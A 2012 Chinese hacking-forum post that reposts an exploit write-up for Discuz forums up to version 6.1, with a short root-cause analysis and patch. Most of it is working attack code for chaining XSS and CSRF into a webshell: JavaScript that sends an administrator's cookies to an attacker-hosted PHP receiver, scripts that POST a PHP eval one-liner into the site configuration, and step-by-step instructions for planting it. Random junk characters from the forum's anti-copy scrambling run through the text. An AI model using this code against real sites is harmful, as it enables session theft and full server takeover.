找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3536|回复: 0
打印 上一主题 下一主题

Discuz XSS得webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:11:49 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Discuz XSS得webshell
% o" h; Q1 ?2 ~6 n( h) xBy racle @tian6.com
( ]: @9 Z5 p! a( L5 L1 B, B0 L8 F欢迎转帖.但请保留版权信息.
* a& A$ G  h& L& |9 k. V受影响版本iscuz<=6.1.0,gbk+utf+big5  `9 C: J8 Q/ y
& L8 q2 k( S% O! C
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.5 X/ _2 w2 V+ U! h
. Y7 _4 L" D% g. I1 Y% }3 S
8 S# Y, ^, K, h0 T
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=87066 y" _0 S$ m2 l1 W! C
当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
9 {# T, b* W/ q$ X2 e- }6 l6 ~: v3 `
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..( S' V4 J: `! j8 I1 j. Z, i/ K3 M
本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
" C1 c. q6 C6 g
9 x8 w4 w( J6 v, _
  ]: R0 i; ]& l( o& h: n: D" b% D  d----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------* v$ M( p6 @& @' }/ F' d( c# E% K2 f

& g, P+ y6 \3 i3 X) _$ L
* {7 P& G; W7 Yproblem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.5 e( A$ c6 E8 o9 I! \# _2 ?3 A

: K4 q. C% k3 xproblem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
9 B  U/ f4 c9 f( ^
; i0 v; h5 s0 y( vproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
& W+ h+ t2 c" D/ t+ x
+ |# Q0 f5 V$ |/ u  }8 m& z4 q
% C3 C9 u1 C! U4 [下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {- X4 ?2 f6 g) s5 @3 R

$ ^+ w% ?& v0 Y. T. t        global $runwizardfile, $runwizardhistory;
6 o0 h, I5 V1 \& X9 T
- Q% a( R1 C- j) N. N7 r& c        $fp = fopen($runwizardfile, 'w');0 K) E; G2 [+ L( S

5 l, j; o9 E" p2 \        fwrite($fp, serialize($runwizardhistory));( o+ {" G& F" X5 A9 ]7 q

  I* F0 _9 d- b. h( X        fclose($fp);; o# T3 m( R) @8 ~9 g

  h" Y9 X+ W, F- d, w}7 p/ m, ^$ Q/ u6 P- c6 W
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
, ^+ Q5 A7 \& Y& M; ~- z以下是修补的办法:function saverunwizardhistory() {  `, P' Q+ [) ~9 Q
/ y& W; }' d6 Q6 a6 P4 [
        global $runwizardfile, $runwizardhistory;1 P+ H$ j1 s) r  q% u

0 v" w9 S# a4 \( N+ O3 r" C        $fp = fopen($runwizardfile, 'w');4 q$ w* a* I/ E# X# v

  i( H, C5 }2 p        $s = '<?php exit;?>';: q9 u" _" a3 A1 c' R- [  }
" ~3 V' J2 Z) E/ ?$ w- D
        $s .= serialize($runwizardhistory);
% q8 K+ D4 w  N) e! v5 d7 Y
+ ]7 u$ Y4 E. N  [, _) M. o6 C        fwrite($fp, $s);
2 K$ t* _, u! C1 a6 c. L7 [/ L" o+ u2 P' Q
        fclose($fp);1 G  I5 f. B4 `, T- R, s
! b6 }# D7 t$ i. z( [. I
}  U4 ?/ M1 j: h% c2 X- i# q
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
7 a+ q! o. R2 U; E( D$ b6 T' J6 e# W& X! M

  Z) E: e: ~! d; |4 L4 n5 s0 v0 r6 V( Z4 _2 Y6 ^- x
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
: |: I  ^% |0 j. i& v: B, _3 h$ m/ H

* I" s- i( r, M6 ]+ g  W- F2 o  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
' g% l$ B; s" Y( g/ C1 R/ l) d" ~# m& I
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.1 E9 h) x  {6 M0 k3 G7 x9 `& U1 e1 t
# E& {7 |' R" Y  }" j: F+ z
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
7 ^2 [! T1 q+ D8 q3 n6 o/ }
2 X- M: N  L9 z& S  t% w首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:9 U) _  v9 Y0 P$ ^, o, o
# y& V! S( E. ?- y' k
var url="http://目标网站/admincp.php";      
: ?- t  \. F8 [: A- Z9 h" N7 F; M8 G0 e* L3 W% L
/*获得cookies*/  x( A* O2 u( u) x. J' f2 `
. P% I! i, _* A; V  j2 O
function getURL(s) {
/ `0 M6 d" s$ k5 L8 J+ c
! C, r  n8 n( s/ |- [8 N3 _var image = new Image();
8 g$ p. Q2 L: n; b' c. R# n4 \  _3 S- P% o: A. D
image.style.width = 0;
8 B6 @3 z& N& i. g0 q5 Y
  u  p4 T  M' ~+ u6 ximage.style.height = 0;- F8 M+ Q9 K: l9 y) \3 A2 d
  W* h7 A7 J+ G- h8 }& K5 b
image.src = s;
8 e8 r6 b& G$ L2 j6 I
. L4 f- E4 j- {" u6 U}  ]$ S  `# f4 z3 E
7 [; }% F2 w1 b  Q* a
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php
1 B  ~' ~+ ~& _% q9 F复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
" y8 L" O/ l( \4 N4 T& [复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 4 L5 I+ C/ I7 Y/ C* Q( d7 S; Z4 q
6 g5 E) @4 B0 j  B8 T4 g6 }) k
& J. M4 b' V( q+ [
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
$ G6 g3 R( ]6 h" J0 \4 G7 a: Z
" h# P# c: c3 ]/ m
; T' C+ X# K5 B$ m$ \2 Y# U5 ]% @9 w: X4 N0 e0 P' `$ y& w
/*hash*/
4 z& f; Y! G& x# s% E$ ]) p
& x. t+ p5 J9 {7 bvar xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");
% B7 E: v" P  v9 H4 y$ K- m$ F( F# E
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);( p" k" N: P$ r$ X8 @2 B
5 j: l. v+ [2 L% U, y6 s
xmlHttpReq.send();
  d" G1 c; s8 {, L9 L9 R
7 L! Y' w6 m7 n- Tvar resource = xmlHttpReq.responseText;3 O4 t6 \& f3 I  C& t

3 z+ {8 u0 P. W+ L8 Wvar numero = resource.search(/formhash/);
9 G  G) t3 p9 m" K# S
; B/ P; X8 N6 ~9 ?var formhash=encodeURIComponent(resource.substr(numero+17,8));! f* w# _8 I( d! G

- e( E4 Q. |% e" m6 {+ S. ], `6 \% i! F# D( `" ^; t* t6 h
3 J: ~) p$ \8 n! T/ W" F* `/ N3 m  ^
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
" J1 w. i: K/ p( h1 O3 D" r% I
, K7 R2 f3 N& k3 d3 m! R) uxmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
7 q; |1 T7 u* T( z0 h9 }
- W6 h4 E4 }( G& t0 O; ~xmlHttpReq.setRequestHeader("Referer", url);# h* p) u. Y- v5 g4 i9 |* Y3 a
) c) }/ P) m$ L3 G1 B/ h. E& }6 i
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
  R  t/ a5 @1 J7 f# E
; d& o% K( E* I; P7 YxmlHttpReq.setrequestheader("content-length",post.length);
6 e  a7 V3 x0 l2 \4 n( n+ Z
" W4 O. |' Q7 e# N/ c2 O3 W* A7 dxmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); , p' s  N  g: `  J; T
, l9 A+ b# k* w5 B) K9 p/ T
xmlHttpReq.send(post);//发送数据
/ o$ D/ X% T; {! e: D复制代码这里HASH我假设正确,这样提交,也无须cookies' |( _+ m( b  d2 e. j, V
: f8 \$ B3 i/ ^
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
: X* q% \/ D0 Q$ |
( n: b- L: u+ x/ C7 s3 Jif (!$sock) die("$errstr ($errno)\n");
" j3 ?  g% V  _, B1 O
3 v1 i5 n  m( `3 Z' m5 c$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';5 i% Z! i) |3 z8 k4 x3 T0 E: b

5 d/ P( e4 |$ F; @
7 w5 r: w, `; m$ m6 ^+ r
5 c. _/ h( w! xfwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
6 g6 \# L3 A* \+ |. u; L+ F+ v7 a1 C: [5 Q5 T# O8 p
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");* ]  R3 Q0 O& a0 H( F2 h8 K! }

4 U) ]& o: D% Efwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");* I* \5 K; f7 ^' E$ ]" p
, b) ^: b( u2 }
fwrite($sock, "Accept-Language: zh-cn\r\n");
; N5 g1 K4 O. I/ d- i' K. l9 F, U1 ^/ w1 |
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");2 l5 W  g" T" E3 ]
, ~0 _& T5 ^/ ]" \! b0 A# o9 T
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");- i9 T4 @" L) A( P. s3 z# ], N- \

2 L/ p. H) [  Hfwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");
: J2 t( Q3 F  @( s( N! k1 d. w4 X( j
' I/ G4 b, c% d3 Dfwrite($sock, "Host: $url\r\n");
/ H) g5 m/ z7 E& T$ e  D
& t) Z5 o7 L2 R3 ~8 v6 Sfwrite($sock, "Content-Length: ".strlen($data)."\r\n");
3 G; W- ?) B- [! C8 K% K
8 v1 Q% g3 c- N% g5 cfwrite($sock, "Connection: Keep-Alive\r\n");
) P. _: m  Y7 `5 Y1 }5 B3 _1 K) X4 n, l# O* @
fwrite($sock, "Cache-Control: no-cache\r\n");* h! O, k1 W/ h; W

2 S  B  ~' C" Q" ^fwrite($sock, "Cookie:".$cookies."\r\n\r\n");% a5 E3 _' ?8 `. o' a  J

) V  e. Y/ H8 G1 p% q* b8 v& ufwrite($sock, $data);. j4 b0 N5 k' o* S' D( G# w
- A( z' L* b1 @) c; X0 I4 }& g- J

  W6 q; c( u4 L& A6 d) C7 f. n" L
. _9 ^2 f5 [" W$ z- x$headers = "";4 ^* Q% v+ d9 M2 Q0 f" A" E
( s  u9 {1 @0 c5 P+ L7 a
while ($str = trim(fgets($sock, 4096)))' N9 g8 I; r/ {$ a, [
# u' t! ?1 o6 Q* Y  d4 q# f
     $headers .= "$str\n";* E: [0 N" Y0 V  i
8 \% d! P. L* _1 U
echo "\n";
. p% z1 t4 G& c1 {3 I. l. x! b
. i# W' P/ w9 j8 |) P$body = "";8 T  W0 ^5 C' T' w! {- C

, F. H1 ^) z! `! r0 ~while (!feof($sock))' j, l$ F- i+ e
) L$ B  V4 _$ k5 o
     $body .= fgets($sock, 4096);
4 u1 A4 \8 d' m+ s8 \+ T% @9 F  w
/ b+ y/ g- \5 D, p6 f4 xfclose($sock);  B  A) D4 B" R. Z5 S+ c+ l8 @
. b3 f2 w. `2 L9 t! c* M
echo $body;2 m; f' ^9 e" c+ U6 h2 t. }
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
9 g, m8 Y* K6 [: M) u
+ B6 i0 p# T' B4 H2 S
2 n" m1 d3 Y" `; E+ K& A' Y: F-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------8 t& U7 H3 M  Y1 y

/ f- |, ?+ L7 }3 ]+ ]: o& S7 D! P( A. c/ ?5 \. y* k1 J* K
1HP SOCKET利用方法首先打开racle.js
! W1 ?# y1 R8 }. T7 N+ ?- q# k& W7 D; V" d/ U; f
var url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home: o8 B9 }0 U+ e- g

$ {& D! N: I6 E
! p4 y: n# X$ @; j: o6 R
# K* D4 }9 T9 a然后打开racle@tian6.php
* \" S( E9 b7 x8 M8 `$ }0 _3 N+ R+ t$ }% Y* x
$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com
5 [4 F& {3 A7 n! `, W& ~
0 t4 W/ y/ @! A1 l5 N; }
! {3 \. g! f, M; |9 S3 F- w1 p) a
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:" x: F, e  n" a! Q' d+ U" S( k

2 f( z% U0 L5 E* m& i  J4 @getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
) u: o* @( s- e; e  r6 V  G  K+ M  b4 y% u) e6 k
- R! p  G/ |. D
# n; r: V% c( D! u: }& U' a: t
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));, Y+ Q: D2 [8 _6 z: O
复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
1 k* \0 c# U+ e  P4 e% Q9 \4 n. y6 @, W$ r, U
' e2 v5 |: |3 [. X  a
4 L& \  X1 L" Z7 Z% y
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
# B1 b# @% Z* W4 V& [: D' j- ?; z& D: Q' \9 X+ x. j/ e4 J  c
var formhash=encodeURIComponent(resource.substr(numero+17,8));7 P5 ~% p- T3 ?2 U( R
- O0 i- o- a5 h+ G% ^# f8 Z$ X

" I# v9 v$ x$ c/ @5 A$ t: {2 v" Y0 ?' ^- k6 W
var formhash=encodeURIComponent(resource.substr(numero+9,8));
7 W6 u3 O/ S7 @  C% }! ~& U复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.; r6 o+ o  P& Q8 t" ]2 }2 t5 P% F
5 R+ N) \7 C7 P9 M
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
: }7 a9 E9 }1 Q; ^" W0 N( g' N# \) X9 S+ D; L: ^+ `; @4 x$ B/ m
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.
% X0 K8 N# _2 V' V/ L9 U
4 f9 Z8 J. n: D  u& S% }不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧., N5 b2 f7 ~- E5 F9 B" J$ Z& _
, `0 h7 O! y" \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表